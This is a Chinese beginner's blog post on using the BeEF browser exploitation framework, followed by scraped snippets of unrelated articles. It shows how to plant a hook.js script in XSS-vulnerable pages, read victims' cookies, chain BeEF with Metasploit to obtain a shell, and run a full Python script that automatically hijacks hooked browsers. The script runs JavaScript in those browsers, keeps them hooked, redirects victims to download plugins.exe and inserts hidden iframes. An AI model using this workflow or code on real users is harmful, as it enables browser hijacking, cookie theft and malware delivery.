Oldbowleeeee

BeEF新手记录

BeEf新手向

写在前面

上学期第一次接触到XSS，然后就知道了BeEf这个工具，一直对BeEf很好奇。本文主要是作者作为新手记录学习用的，所以介绍的主要就是BeEf的使用，并没有涉及到底层。新手上路，求轻喷。

BeEF简介

是什么？
BeEf,The Browser Exploitation Framework缩写，攻击者可以对目标进行攻击测试，攻击成功以后会加载浏览器劫持会话，它扩展了跨站漏洞的利用，能HOOK很多浏览器(IE和Firefox等)并可以执行很多内嵌命令。

环境：BT5 【或者Kali】

安装

删除BT5上面自带的版本稍旧的BeEF【kali上也有自带的beef】

rm -rf /pentest/web/beef-ng

git clone https://github.com/beefproject/beef

cd /pentest/web/beef

./beef

然后要开启apache

apache2 start

接着就访问返回信息中的登录地址http://localIP:3000/ui/panel，可以看到一个登录界面，默认账号/密码：beef/beef

这里有个小插曲，我在打开http://192.168.137.134:3000/ui/panel的时候，一直没有显示什么登录框，就以为是安装出了错，原来是我的fx设置了安全限制

访问+测试

访问测试网址http://ip:3000//demos/basic.html，就是说，如果一个网站有XSS漏洞，然后你通过某种方式把你的（钓鱼）网址发到这个有XSS漏洞的页面，受害者点击或者直接访问那个界面时，就会跳转到你构造的钓鱼界面
页面源代码要有

<script src="http://攻击主机IP:3000/hook.js">script>

接着我们就可以在我们的beef上看到有受害者登录了

各个部分解析

Logs

日志，顾名思义，就是记录所有登录过的肉鸡【访问钓鱼网站的机器】
又有问题了——我想用我的物理机访问BT5上的测试网址，然后发现互ping都可以ping得通，就是访问不了。解决方法就是在NAT模式下，添加一个映射端口,接着就物理机和另一台虚拟机【win 2K3】都可以访问了

Current Browser

Details

可以看到肉鸡的详细信息，包括浏览器信息【版本号等】、访问的页面信息【有cookie！！】以及肉鸡的系统信息

Logs

跟上面那个不一样，这里只是当前肉鸡的操作信息

Commands模块metasploit

这里的模块就不详细记录了，有点多，有需要再Google一下(lll￢ω￢)

主要还是记录一下，BeEF与metasploit的结合使用

加载metasploit,可以在上面的截图中看到，没加载之前metasploit那一项的模块是为0的
将文件中的metasploit选项修改为true
查看/pentest/web/beef/extensions/metasploit/config.yaml，看到beef与metasploit通信的密码
转到msf目录/opt/metasploit/msf3/，新建一个 beef.rc文件，内容为：load msgrpc ServerHost=127.0.0.1 Pass=abc123
启动msf

msfconsole –r beef.rc

然后重新启动beef，可以看到这一次的metasploit模块有234个

接着就是msfconsole的使用内容了
看到对应的浏览器使用查找相应的模块然后使用，会返回一个访问地址，用BeEF的Redirect模块，使得当前的受害者访问该地址，之后就可以得到一个shell

BeEF目录

用Ruby语言写的

最主要的目录有三个，core、extension和modules，BEEF的核心文件在core目录下，各种扩展功能在extension目录下，modules则为攻击模块目录。

core目录

BEEF的核心目录，并负责加载扩展功能和攻击模块

client目录下均为js文件，是在受控客户端（hooked browser）使用的js文件，包括net、browser、encode、os等的实现，以update.js为例，在core\main\client\update.js中可以看到，定义了beef.updater，设置每隔5秒check一次是否有新的命令，如果有，则获取并执行之。
console目录用于命令行控制。
constants目录定义了各种常量。
handlers目录主要用于处理来自受控客户端连接请求。
models目录定义了一些基本的类。
rest目录，即WEB服务基于REST原则，是一种轻量级的HTTP实现

extention目录

admin_ui: 实现了一个WEB界面的控制后台。
metasploit: 与metasploit互通相关的设置。
requester: 负责处理HTTP请求
config.yaml为作者和该扩展相关信息。
api.rb为自身注册的一些API函数。
models定义了一个http模型对象，例如，其中有个has_run属性，当请求未发送时，其值为”waiting”，发送攻击时，遍历状态为”waiting”的模块，并发送http请求。
handler.rb 主要是处理http响应，收到响应后将相应的模块has_run状态置为complete，并保存到数据库。

modules目录

集合了BEEF的各个攻击模块，一般一个攻击模块分为3个文件：command.js、config.yaml、module.rb。这样的结构可以很方便地进行模块添加，易于扩展。
config.yaml: 攻击模块相关信息，如名称、描述、分类、作者、适用场景等
module.rb:文件定义了该攻击模块的类，继承了BEFF::Core::Command类，在通用command类的基础上定义一些该模块特有的处理函数，如使用较多的一个函数是post_execute，即攻击进行后进行的操作（一般为保存结果）

自动化脚本python

最近在学python写工具，所以最后收藏一个大佬分享的beef自动化脚本【加上了自己的理解】

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ** Author: ssooking
# ** Name： AutoBeef.py

import json
import urllib2
import time

hostlist = []
hostdict = {}


# 1、获得API key，每次开启beef都会不一样
def getauthkey(host):
    # host 是hook页面的url
    # /api/admin/login是用户登录接口，通过
    # 该接口登录之后，我们可以得到用于会话认证的API key
    apiurl =  host + "api/admin/login"       
    logindata = {
        "username":"beef",
        "password":"beef"
    }
     # 对数据进行JSON格式化编码
    jdata = json.dumps(logindata)            
     # 生成页面请求的完整数据
    req = urllib2.Request(apiurl, jdata)     
    # 发送页面请求
    response = urllib2.urlopen(req)           
    # 获取服务器返回的页面信息，数据类型为str
    resdata = response.read()                 
    # 把数据解析成python对象，此时返回dict数据
    jsondata =  json.loads(resdata)           
    return jsondata['token']


# 2、获得hook主机列表,session值就是cookie
def getHookedBrowsersSession(host,authkey):
    # 用到了前面的API key
    f = urllib2.urlopen(host + "/api/hooks?token=" + authkey)
    data = json.loads(f.read())
    hookonline = data['hooked-browsers']['online']
    for x in hookonline:
        hookid = hookonline[x]['id']
        hookip = hookonline[x]['ip']
        hooksession = hookonline[x]['session']
        if hookid not in hostdict:
            hostdict[hookid] = hooksession
            print "\n[+] Hooked host id:  " + bytes(hookid) + "\n   >>> IP: " + bytes(hookip) + "\n   >>> Session: " + hooksession

#3、模块使用 
# 终端命令：curl -i -H "Content-Type: application/json; charset=UTF-8" -d '{各个模块需要的额外的参数}' http://xxxxx/api/modules/【受害者浏览器】session/模块id?token=【authkey】
#受害者在试图关闭选项卡时会向用户显示"关闭确认"对话框，
#通过这种方式来增加shell的存活时间
# persistence -> confirm close tab
def sendConfirm(host, session, authkey):
    postdata = '{}'
    url = host + "api/modules/" + session + "/46?token=" + authkey
    #print url
    req = urllib2.Request(url, postdata)
    req.add_header("Content-Type", "application/json; charset=UTF-8")
    f = urllib2.urlopen(req)
    print "   >>> [+] Module Confirm Close Tab has been Executed ! "
    return f.read()         


# 使用beef模块，弹窗功能
# Misc -> IBM iNotes -> RAW js
def execJavascript(host, session, authkey):

    payload={
        "cmd":"alert('Hello by ssooking!');"
    }
    # 169是beef模块的id
    apiurl = host + "api/modules/" + session + "/3?token=" + authkey
    jdata = json.dumps(payload)
    req = urllib2.Request(apiurl, jdata)
    req.add_header("Content-Type", "application/json; charset=UTF-8")
    response = urllib2.urlopen(req)
    resdata = response.read()
    print "   >>> [+] Module Raw JavaScript has been Executed ! "
    return resdata

# 使受害者浏览器跳转到一个下载页面并下载。。。

def redirectBrowser(host, session, authkey):
    payload = {"redirect_url":"http://192.168.137.134:8000/plugins.exe"}
    apiurl = host + "api/modules/" + session + "/42?token=" + authkey
    jdata = json.dumps(payload)
    req = urllib2.Request(apiurl, jdata)
    req.add_header("Content-Type", "application/json; charset=UTF-8")
    response = urllib2.urlopen(req)
    resdata = response.read()
    jsondata =  json.loads(resdata)
    print "   >>> [+] Module Redirect Browser has been Executed ! "
    return jsondata


# 创建一个隐藏的Frame,target是目的地的url
# Misc -> IBM iNotes -> Create Invisible iframe
def createIFrame(host, sessionId, authkey):
    postdata = '{"target":"http://192.168.137.134:8000/"}'
    url = host + "api/modules/" + sessionId + "/4?token1=" + authkey
    req = urllib2.Request(url, postdata)
    req.add_header("Content-Type", "application/json; charset=UTF-8")
    f = urllib2.urlopen(req)
    print "   >>> [+] Module Create Invisible Iframe has been Executed ! "
    return f.read()




def autoRunModules(host,session,authkey):
    # sendConfirm(host, session, authkey)
    execJavascript(host, session, authkey)
    # redirectBrowser(host, session, authkey)


def timeRun(interval,host):
    authkey = getauthkey(host)
    print "[+] AutoBeef is running...."
    print "[+] BeEF KEY is : "+ authkey
    print "[+] Base BeEF API URL: "+ host + "api/"
    print "[+] Hook URL   : " + host + "hook.js"
    print "[+] Hook Demo  : " + host + "demos/basic.html"
    while True:
        try:
            getHookedBrowsersSession(host, authkey)
            for x in hostdict:
                if hostdict[x] not in hostlist:
                    hostlist.append(hostdict[x])
                    autoRunModules(host,hostdict[x],authkey)
            time.sleep(interval)
        except Exception, e:
            print e

if __name__ == '__main__':
    beefhost = "http://192.168.137.134:3000/"
    timeRun(3,beefhost)

脚本出处：
https://www.cnblogs.com/ssooking/p/6959239.html#_label0【利用BeEF REST API自动化控制僵尸主机】

你可能感兴趣的:(安全)

Java为枚举类创建成员变量_Java学习——枚举类陈宇卿 Java为枚举类创建成员变量
Java学习——枚举类摘要：本文主要介绍了Java的枚举类。部分内容来自以下博客：https://www.cnblogs.com/sister/p/4700702.htmlhttps://blog.csdn.net/zhou520yue520/article/details/80952404为什么使用枚举类枚举类更加直观，类型安全。使用常量会有以下几个缺陷：类型不安全。若一个方法中要求传入季节这个
大洋链Oeanc为何会带动世界潮流 7284e6cf7e7c
到现在，可能还有一些人不太了解什么是区域链。百度对于区域链的解释是：区块链是比特币的底层技术，像一个数据库账本，记载所有的交易记录。这项技术也因其安全、便捷的特性逐渐得到了银行与金融业的关注。其实通俗易懂的来说，区域链就是记载交易记录的技术，这个技术是很安全的。而区域链中的大洋链Oeanc，则是更加的先进和安全。其实大家所熟知的比特币也是属于区域链。在现如今经济全球化下，人们更加的看重经济的安全和
105钟小葵丰盛日记2019.3.6 钟小葵zxk
今天早上一大早就起床了，做好早饭，大家都起床了，大嫂帮忙炒菜，大哥帮忙送女儿去坐校车，吃完早餐，大哥送大嫂和陈生去上班，我自己打车去东莞汽车东站坐车回娘家。上车时只有我和司机四人，已经过完年出行的高峰期，全程才十多个人。归心似箭，下雨天，为了安全起见，司机开车比较慢。早上八点二十出车，到下午二点半才到家。放下行李先去吊唁爷爷，眼泪夺眶而出。爷爷，一路走好。
安全之重诸葛妙计
平时总能听到安全第一，安全第一，安全说了千万遍，但是放心里的人多吗？这一次我是真的有了切肤之痛。但似乎感悟的有点晚。三月底，一天中午快下班的时候，有点垃圾要运到地下二层垃圾房，就和一同事一起用电三轮进地下车库送垃圾，这是一条长下坡，我掌着车把，下去的时候却没有着急踩刹车，而我同事坐在我的右边，脚挡住了刹车，当车速度起来了，我想踩刹车，却被同事的腿挡着了，我让他踩，他却没有及时踩，然后车极速前进，控
不去讨好任何人，发现自己若水伊伊
你为什么无法拒绝别人呢？而你不能拒绝别人的行为背后是一拒绝别人就感到恐惧的感受和别人很脆弱，我很脆弱关系很脆弱的不合理信念的。萨提亚老师说过：“人最大的本能不是生存，而是寻求安全感。如果我们在童年中持续拥有的都是“有条件的爱”，接触的都是需要被讨好的人时候，我们将在一生中强迫性地重复这种强烈而深刻的互动模式。讨好型的人格并没有意识到现，即便自己不拒绝别人，也无法让每个人都满意，让所有人都满意是不可
极狐GitLab 17.3 重点功能解读极小狐 gitlab 极狐GitLab DevOps ci/cd kubernetes
极狐GitLab是GitLab在中国的发行版，可以私有化部署，对中文的支持非常友好，是专为中国程序员和企业推出的企业级一体化DevOps平台，一键就能安装成功。安装详情可以查看官网指南。极狐GitLab17.3正式发布了多项与敏捷项目管理、源代码托管、CI/CD及安全合规相关的更新，以下是部分重点功能解读。完整版本功能解读参考https://gitlab.cn/resources/articles
2024年入职/转行网络安全，该如何规划？_网络安全职业规划徐老师教网络安全 web安全安全 php https 网络协议
前言前段时间，知名机构麦可思研究院发布了《2022年中国本科生就业报告》，其中详细列出近五年的本科绿牌专业，其中，信息安全位列第一。网络安全前景对于网络安全的发展与就业前景，想必无需我多言，作为当下应届生收入较高的专业之一，网络安全同样也在转行领域中占据热门位置，主要具备以下几点转行优势：行业人才缺口大，至2027年我国网安人才缺口将达327万知识体系友好，计算机及英语水平相对薄弱的同学也可学习上
趣闲赚真的可以赚钱？趣闲赚好做吗？趣闲赚手机做任务赚佣金
趣閑賺真的可以賺錢嗎？關於這個問題網上眾說紛紜，有人說的確是真的，自己已經掙了好幾萬，也有人說這是一個騙局。在小編看來，各位說的都有道理，畢竟每個人對網絡的了解程度不同，針對同一款手機軟件看法也不同，自然會得出不同的結論。據我了解，有三種人說趣閑賺是騙人的不安全，都是哪三種人呢？趣闲赚上面的任务单价也就是几块钱到几十元一单，做的多挣的多。【趣闲赚】拿着手机做赏金任务，1元提现秒到账，在家躺着也赚钱
SpringSecurity学习笔记 coder_wangzw 学习 servlet java
SpringSecurity学习笔记一、SpringSecurity介绍：1.SpringSecurity是基于Spring的身份认证（Authentication）和用户授权（Authorization）框架，提供了一套Web应用安全性的完整解决方案。其中核心技术使用了Servlet过滤器、IOC和AOP等。2.什么是身份认证身份认证指的是用户去访问系统资源时，系统要求验证用户的身份信息，用户身
软件测试项目渔jy 软件测试业务流程测试软件测试
1.给你一个网站，该如何测试？（探究需求+制订计划）首先，查找需求说明、网站设计等相关文档，分析测试需求。制定测试计划，确定测试范围和测试策略，一般包括以下几个部分：功能性测试；界面测试；性能测试；数据库测试；安全性测试；兼容性测试功能性测试可以包括，但不限于以下几个方面：链接测试。链接是否正确跳转，是否存在空页面和无效页面，是否有不正确的出错信息返回。提交功能的测试。多媒体元素是否可以正确加载和
返利APP里面的东西是正品吗不会这么便宜吧氧惠帮朋友一起省
在电商世界中，直返作为一种独特的购物模式，正逐渐受到消费者的青睐。那么，直返的东西是否正品？直返APP安全吗？接下来，我们将为你揭开直返的神秘面纱，带你了解这个充满魅力的平台。氧惠APP（带货领导者）——是与以往完全不同的抖客+淘客app！2023全新模式，我的直推也会放到你下面。主打：带货高补贴，深受各位带货团队长喜爱（每天出单带货几十万单）。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推
Go 语言实现基本区块链模型醉墨居士 Go 区块链 golang 区块链哈希算法后端算法去中心化共识算法
文章目录前言交易结构体区块结构体区块链结构体计算区块哈希值工作量证明（PoW）生成新区块验证区块合法性添加新区块最后前言你好，我是醉墨居士，在当今的技术领域，区块链技术无疑是一颗璀璨的明珠，其去中心化、不可篡改和安全可靠的特性吸引了无数开发者的目光，在这篇博客中我将介绍如何使用强大和高效的Go语言开发一个极简的区块链模型交易结构体typeTransactionstruct{Senderstring
赚钱的软件哪个安全又赚钱？高省app解答你的需求浮沉导师
寻找安全又赚钱的赚钱软件一直是人们关注的焦点。在众多的赚钱app中，高省app以其真实有效且靠谱的特点吸引了众多用户的关注。本文将详细介绍高省app以及其在安全赚钱和盈利效果方面的优势。一、高省app的安全性保障作为一个正规的赚钱应用，高省app注重用户隐私保护和账户安全。它采用了严格的安全措施，包括数据加密、用户信息保护等，确保用户的个人数据不会被泄露或滥用。此外，高省app与合作伙伴建立了稳定
数据库（MySQL)的基本操作 m0_74846139 数据库 mysql
1.简介（1）数据库1.数据库（DataBase，简称DB）：长期保存在计算机的存储设备上，数据是按照一定的规则组织起来的，能被用户、应用平台共享的数据集合。（存储、维护和管理数据的集合）2.数据库管理系统(DatabaseManagementSystem,简称DBMS）：指的是一种用来管理和操作数据的大型软件，用于建立、使用、维护数据，对数据库进行统一的管理和控制，以保证数据的完整性和安全性。用
“我的人生就像在白夜里走路” 令狐泽
花了很多个晚上和周末的时间终于把《白夜行》读完，心情久久不能平静，思绪万千，在合上书的那一刻，又一次被日本小说那种对人性的深刻揭示给震撼到了。悲剧的开始或许只是偶然，但悲剧的持续总是有着令人深思的社会根源。小说中多次提到废弃的烂尾楼和日本泡沫经济，此时正是日本经济大萧条时期，泡沫经济的破灭、大批企业倒闭致使失业率骤增，经济跌入谷底，为了生存，为了安全感，金钱成为凌驾于亲情友情爱情等人与人之间最宝贵
去大山玩赵迁越
经过我和弟弟几天的软磨硬泡，爸爸终于同意带我和弟弟去大山玩。一路上欢歌笑语，凉凉的微风把我的心情也吹起来了！路越来越陡，山越来越高，风也越来越大。我们大口呼吸着山中的新鲜空气，欣赏着大山的巍峨气魄。我和弟弟来到单脚行走的木桩，比赛谁先到。爸爸负责我们的安全。我因为着急得第一，伤着一次，想退出比赛，爸爸鼓励我，不论输赢要坚持到底，我又有了信心，最后我赢得了这场比赛。我们恋恋不舍的下山了，回头望着越来
医药医疗行业数字化转型数据架构设计方法论及典型案例数字化建设方案数字化转型数据治理主数据数据仓库大数据人工智能数据挖掘数据库架构
医药医疗行业数字化转型数据架构设计方法论及典型案例医药医疗行业数字化转型数据架构设计方法论及典型案例数字化转型背景与趋势医药行业现状及挑战数字化转型必要性发展趋势与前景展望数据架构设计方法论数据架构概述及重要性设计原则与策略制定实施步骤与关键技术典型案例分析：某大型药企数据架构实践项目背景与目标设定数据架构规划与设计过程实施效果及经验总结面临的挑战与解决方案数据质量管理问题及对策数据安全防护策略部
把背包丢过墙小可乐的妈妈
曾听过这样一个故事:当一个人背着包，跑向目的地时遇到了一面阻碍他去路的墙。他该怎么做？有一种人选择放弃，转身离开；而另一种人则选择把背包扔过墙，然后想办法，绕过或翻过这面墙。两种人，两种做法，体现了两种不同的思维模式，一种是确保稳妥后再行动的谨慎型，一种是不避艰险立即行动的果敢型。前者看起来更安全，也是多数人的选择；后者看起来很冒险，只有少数人会这么做。而要做成一件事，更高效的往往是后者。当一个人
返利app排行榜！返利平台哪个佣金更高桃朵app
返利app排行榜！返利平台哪个佣金更高排名第一的是乖淘app。佣金高。模式好。第二是桃朵。稳定安全。本文作者：乖淘&创始人导师（26688）霸屏找乖淘！价格低效果好！专注网络推广20年，累积精准引流过千万。应用商店搜索下载乖淘，填写邀请码123456注册后，后台可以联系我，注册免费送运营商，送万元推广大礼包，送百度霸屏、强势引流技术！返利已经成为网购省钱的必备技能，返利App也是五花八门，越来越多
Docker mysql 配置文件读取失败 [Warning] World-writable config file ‘/etc/mysql/conf.d/my.cnf‘ is ignored. DN金猿 docker docker mysql 容器
这个警告表明MySQL正在忽略/etc/mysql/conf.d/my.cnf这个配置文件，因为它被设置为了全世界可写。这个警告是基于安全性的考虑。当配置文件被设置为全世界可写时，任何人都可以修改它，这可能会导致安全风险，因为恶意用户可以更改MySQL的配置，从而影响数据库的行为和安全性。为了解决这个问题，你可以按照以下步骤进行操作：更改配置文件的权限：使用chmod命令将配置文件的权限设置为更安
防火墙安全攻防：威胁洞察与防御策略解析专家大圣信息安全网络 web安全安全
摘要：随着信息技术的飞速发展，网络安全问题日益凸显。防火墙作为网络安全的重要防线，面临着各种攻击的威胁。本文详细探讨了防火墙可能遭受的攻击方式，包括常见的网络层攻击、应用层攻击等，并深入分析了相应的防御策略和技术，旨在为构建更加安全可靠的网络环境提供参考。目录一、引言二、防火墙概述三、防火墙攻击方式四、防火墙防御策略五、防火墙技术发展趋势六、结论一、引言在当今数字化时代，网络已经成为人们生活和工作
亲子教育～态度问题杨钥钥
父母常常把孩子的能力问题视为态度问题，在孩子最需要帮助时给予打击和责罚。如认为孩子哭闹是脾气坏、任性，而不从孩子需要提升理性表达情绪的能力方面去理解；如孩子认生或被欺负是胆小、懦弱，而不想着去提升孩子的安全感、勇气和交往能力。这不仅无助问题解决，还容易导致孩子低自尊、低自我评价。把孩子的能力问题视为态度问题，多源于父母对孩子所处生长阶段的身心规律、特点缺乏了解和尊重，拿孩子当“大人”，甚至“圣人”
什么是端点安全 ManageEngine卓豪终端管理终端安全终端安全端点安全
端点安全是网络安全策略的重要组成部分，侧重于保护网络中的各个设备（端点）免受各种网络威胁和未经授权的访问。通过实施全面的端点安全解决方案，可以降低与恶意软件感染、数据泄露、网络钓鱼攻击和内部威胁等相关风险。什么是端点端点包括各种设备，包括：笔记本电脑台式电脑移动设备（如智能手机和平板电脑）服务器IoT设备销售点系统数字打印机每个端点都是网络漏洞和破坏网络安全的潜在切入点。为什么需要端点安全端点安全
什么是日志分析 ManageEngine卓豪日志管理日志分析日志管理
日志分析（或日志文件分析）是检查整个网络生成的日志数据的过程，日志数据从各种来源生成，包括外围设备、工作站、服务器、应用程序以及其他硬件和软件组件，集中收集并分析这些信息，可以更好地理解网络运行、排除故障、维护网络安全。如何分析日志文件执行日志分析可以通过两种方式完成：手动筛选日志数据或使用日志分析工具。手动日志分析手动日志分析涉及个人或团队对日志文件进行物理检查，由于日志数据的数量和复杂性，这可
计算机三级数据库---基础篇沐硕数据库
适合考前14天以上的小伙伴按照以下章节进行详细学习第一章数据库应用系统开发方法选择题第二章需求分析选择题第三章数据库结构设计（自底向上）选择题第四章数据库应用系统功能设计与实现选择题第五章UML与数据库应用系统填空+选择第六章高级数据查询填空题第七章数据库及数据库对象大题第八章数据库后台编程技术填空题第九章安全管理选择题第十章数据库运行维护与优化填空+选择第十一章故障管理选择题第十二章备份与恢复数
疫苗●天堂严意军TOMATO
(关注微信号：tomatoqq)这个周末被疫苗之王刷屏，翻开小孩的疫苗本，有这家公司疫苗的接种记录，但中彩没有就不知道了。这段时间遇到装修公司携款跑路，项目经理敲诈、威胁业主安全，比起假疫苗事件太微乎其微了。这里国泰民安、社会和谐，不但是大家的幸福天堂，也是政客和商客的醉美天堂，遇事总能大事化小、小事化了。就像贾跃亭跑了，转个身就有人来送钱，又是一个大牛。儿童节的礼物——宝宝们的明天会更好疫苗之王
设计模式（四）：创建型设计模式这里用来记录
一、单例模式1.为什么要使用单例？单例设计模式（SingletonDesignPattern）理解起来非常简单。一个类只允许创建一个对象（或者实例），那这个类就是一个单例类，这种设计模式就叫作单例设计模式，简称单例模式。如何实现一个单例1.饿汉式在类加载的时候，instance静态实例就已经创建并初始化好了，所以，instance实例的创建过程是线程安全的。不过，这样的实现方式不支持延迟加载pub
C++设计模式---单例模式 xinruoqianqiu 设计模式 c++设计模式单例模式
1、介绍单例模式（SingletonPattern）是一种创建型设计模式，它确保一个类只有一个实例，并提供一个全局访问点来获取这个唯一实例。这种模式在多线程环境中需要特别注意线程安全，并且应该避免在析构时产生问题（如产生死锁）。思考：如何绕过常规的构造函数，提供一种机制来保证一个类只有一个实例。解决过程：（1）要实现单例模式，先把构造函数私有化。私有化带来的问题是：外部不可以定义对象，即不可以从外
陪玩系统怎么保证安全性和隐私保护呢？有现成系统可打包App小程序H5公众号，源码交付支持二开 yuanmaxiaoxiao web app 微信小程序
陪玩系统在保证安全性和隐私保护方面，通常会采取一系列综合性的措施来确保用户的个人信息和游戏账号安全。以下是一些主要的措施：一、加强数据加密与存储安全数据加密：对用户的敏感数据（如个人信息、支付信息、聊天记录等）进行加密处理，使用业界认可的加密算法（如SSL/TLS加密传输）来保护数据在传输和存储过程中的安全性。安全存储：将用户数据存储于安全隔离的服务器上，防止未经授权的访问和数据泄露。这些服务器通
非关系型数据库Redis部署与常用命令 Fang_Qianling 非关系型数据库Redis redis
前言Redis是一个高性能的开源内存数据库，常用于缓存、会话存储和实时数据处理，它是一款非关系型数据库。在生产环境中，Redis通过将数据存储在内存中以及支持多种数据结构，提供了快速的读写能力，并且可通过持久化功能确保数据安全。其作为消息代理系统还能支持发布/订阅模式，使得它成为构建实时通信和事件驱动架构的理想选择。目录一、关系数据库与非关系型数据库1.关系型数据库2.非关系型数据库3.区别二、R
Java 并发包之线程池和原子计数 lijingyao8206 Java计数 ThreadPool 并发包 java线程池
对于大数据量关联的业务处理逻辑，比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式，并且可以提高线程利用率，并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
java编程思想抽象类和接口百合不是茶 java 抽象类接口
接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持 1 ,抽象类 : 如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错) 抽象方法 : 在方法中仅有声明而没有方法体 package com.wj.Interface;
[房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间... 所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产 &nb
数组队列总结沐刃青蛟数组队列
数组队列是一种大小可以改变，类型没有定死的类似数组的工具。不过与数组相比，它更具有灵活性。因为它不但不用担心越界问题，而且因为泛型（类似c++中模板的东西）的存在而支持各种类型。以下是数组队列的功能实现代码： import List.Student; public class
Oracle存储过程无法编译的解决方法 IT独行者 oracle 存储过程　
今天同事修改Oracle存储过程又导致2个过程无法被编译，流程规范上的东西，Dave 这里不多说，看看怎么解决问题。 1. 查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
重装系统之后oracle恢复文强chu oracle
前几天正在使用电脑，没有暂停oracle的各种服务。突然win8.1系统奔溃，无法修复，开机时系统提示正在搜集错误信息，然后再开机，再提示的无限循环中。无耐我拿出系统u盘准备重装系统，没想到竟然无法从u盘引导成功。晚上到外面早了一家修电脑店，让人家给装了个系统，并且那哥们在我没反应过来的时候，直接把我的c盘给格式化了并且清理了注册表，再装系统。然后的结果就是我的oracl
python学习二（一些基础语法）小桔子 pthon 基础语法
紧接着把！昨天没看继续看django 官方教程，学了下python的基本语法与c类语言还是有些小差别： 1.ptyhon的源文件以UTF-8编码格式 2. / 除结果浮点型 // 除结果整形 % 除取余数 * 乘 ** 乘方 eg 5**2 结果是5的2次方25 _&
svn 常用命令 aichenglong SVN 版本回退
1 svn回退版本 1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别: revert this version:表示回退到当前版本(该版本后的版本全部作废) revert chanages from this versio
某小公司面试归来 alafqq 面试
先填单子，还要写笔试题，我以时间为急，拒绝了它。。时间宝贵。老拿这些对付毕业生的东东来吓唬我。。面试官很刁难，问了几个问题，记录下； 1，包的范围。。。public,private,protect. --悲剧了 2，hashcode方法和equals方法的区别。谁覆盖谁.结果，他说我说反了。 3，最恶心的一道题，抽象类继承抽象类吗？（察，一般它都是被继承的啊） 4，stru
动态数组的存储速度比较集合框架百合不是茶集合框架
集合框架：自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
用JS实现一个JS对象，对象里有两个属性一个方法 bijian1013 js对象
<html> <head> </head> <body> 用js代码实现一个js对象，对象里有两个属性，一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
探索JUnit4扩展：使用Rule bijian1013 java 单元测试 JUnit Rule
在上一篇文章中，讨论了使用Runner扩展JUnit4的方式，即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule &n
[Gson一]非泛型POJO对象的反序列化 bit1129 POJO
当要将JSON数据串反序列化自身为非泛型的POJO时，使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种： 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段，例如泛型集合或者泛型类 Data类 a.不是泛型类， b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO
【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
0.Kafka服务器的配置一个Broker，一个Topic Topic中只有一个Partition（） 1. Producer： package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
lsyncd实时同步搭建指南——取代rsync+inotify ronin47
1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案，原先使用的是 inotify + rsync，但随着文件数量的增大到100W+，目录下的文件列表就达20M，在网络状况不佳或者限速的情况下，变更的文件可能10来个才几M，却因此要发送的文件列表就达20M，严重减低的带宽的使用效率以及同步效率；更为要紧的是，加入inotify
java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时，肯定是查找树 *2.只有两个结点时，肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
MySQL的sum函数返回的类型 bylijinnan java spring sql mysql jdbc
今天项目切换数据库时，出错访问数据库的代码大概是这样： String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
java设计模式之单例模式 chicony java设计模式
在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的：　　作为对象的创建模式，单例模式确保某一个类只有一个实例，而且自行实例化并向整个系统提供这个实例。这个类称为单例类。单例模式的结构　　单例模式的特点：单例类只能有一个实例。单例类必须自己创建自己的唯一实例。单例类必须给所有其他对象提供这一实例。　　饿汉式单例类 publ
javascript取当月最后一天 ctrain JavaScript
 <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
linux tune2fs命令详解 daizj linux tune2fs 查看系统文件块信息
一.简介： tune2fs是调整和查看ext2/ext3文件系统的文件系统参数，Windows下面如果出现意外断电死机情况，下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检，而且是可以通过tune2fs命令，自行定义自检周期及方式。二.用法： Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
做有中国特色的程序员 dcj3sjt126com 程序员
从出版业说起网络作品排到靠前的，都不会太难看，一般人不爱看某部作品也是因为不喜欢这个类型，而此人也不会全不喜欢这些网络作品。究其原因，是因为网络作品都是让人先白看的，看的好了才出了头。而纸质作品就不一定了，排行榜靠前的，有好作品，也有垃圾。许多大牛都是写了博客，后来出了书。这些书也都不次，可能有人让为不好，是因为技术书不像小说，小说在读故事，技术书是在学知识或温习知识，有
Android：TextView属性大全 dcj3sjt126com textview
android:autoLink 设置是否当文本为URL链接/email/电话号码/map时，文本显示为可点击的链接。可选值(none/web/email/phone/map/all) android:autoText 如果设置，将自动执行输入值的拼写纠正。此处无效果，在显示输入法并输
